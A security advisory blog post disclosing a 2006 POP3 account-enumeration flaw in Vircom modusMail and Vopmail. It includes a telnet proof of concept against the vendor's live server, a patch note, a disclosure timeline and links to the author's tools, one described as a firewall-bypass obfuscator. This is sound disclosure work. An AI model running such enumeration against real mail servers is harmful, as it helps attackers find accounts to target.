Just Another Hacker
Author's avatar

Vircom vopmail / modusmail information disclosure

By Eldar Marcussen

modusMail All in one email security solution

The modusMailâ„¢ mail server provides all-in-one email services, messaging security and spam protection. [ Taken from: http://www.vircom.com/en/products/modusmail/ ]

Vulnerability description

A conditional information disclosure exists in older versions of modusMail and Vopmail that will disclose whether an email account exists or not. The disclosure is conditional upon the presence of a @ or % character in the username. This is usually used when one mail system is responsible for the email of several domains. If the @ or % character was not present in the username the pop3 server would request a password before rejecting the login, as opposed to aborting the login attempt after receiving the user portion of the login.

  • Discovered by: Eldar “Wireghoul” Marcussen
  • Vendor: Vircom - http://www.vircom.com
  • Affected versions:
  • Modus mail <= 4.4.491
  • Probably all versions of Vopmail

Proof of Concept

~$ telnet pop.vircom.com 110
            Trying 64.18.73.12...
            Connected to gate.vircom.com.
            Escape character is '^]'.
            +OK modusMail POP3 Server 4.4.491.0 Ready
            <mailto:37819600.1156428713.245@vircom.com>
            <37819600.1156428713.245@vircom.com>
            user nosuchuserhere
            +OK nosuchuserhere is welcome here
            quit
            +OK vircom.com POP3 server signing off (mailbox empty)
            Connection closed by foreign host.

            ~$ telnet pop.vircom.com 110
            Trying 64.18.73.12...
            Connected to gate.vircom.com.
            Escape character is '^]'.
            +OK modusMail POP3 Server 4.4.491.0 Ready
            <mailto:36899224.1156429893.504@vircom.com>
            <36899224.1156429893.504@vircom.com>
            user nosuchuser@nosuchhost.com
            -ERR nosuchuser@nosuchhost.com not known
            user nosuchuser%nosuchhost.com
            -ERR nosuchuser%nosuchhost.com not known
            quit
            +OK vircom.com POP3 server signing off (mailbox empty)
            Connection closed by foreign host.

Solution

Upgrade to a more recent version

Disclosure time line

  • 06-Nov-2009 - Public disclosure
  • 15-Sep-2006 - New version of modusMail mitigate this
  • 20-Aug-2006 - Vendor acknowledge vulnerability
  • 19-Aug-2006 - Vendor notified through email

graudit

Static source code analysis tool for finding vulnerabilities in source code.

htshells

Self contained attacks against per directory configuration in web servers.

PHP omelette

Code obfuscation tool for bypassing web application firewalls.

More

All of the project information on one page!

⠓⠁⠉⠅⠑⠗